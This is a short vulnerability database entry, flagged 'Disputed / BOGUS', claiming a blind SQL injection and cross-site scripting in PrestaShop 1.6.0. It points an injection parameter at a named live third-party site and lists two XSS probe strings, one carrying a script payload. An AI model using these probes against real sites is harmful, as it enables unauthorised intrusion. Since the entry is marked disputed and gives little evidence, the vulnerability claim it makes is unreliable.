Disputed / BOGUS

PrestaShop 1.6.0 Blind SQL Injection

Published / (Updated): 2014-05-05 / 2014-05-07
Credit: indoushka
Risk: Medium
CWE: CWE-89
CVE: N/A
Local: No
Remote: Yes

PrestaShop V1.6.0 Blind SQL Vulnerability 0-Day
===============================================
Author : indoushka
vendor : http://www.prestashop.com/fr/telechargement
Dork : No 4 noob

http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject here)

Login :

path/admin

Cross site scripting :

/index.php?controller=search&tag=bat_213771818860'():;771818860
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search

References:

http://cxsecurity.com/issue/WLB-2014040091
http://www.prestashop.com/fr/telechargement



Copyright 2017, cxsecurity.com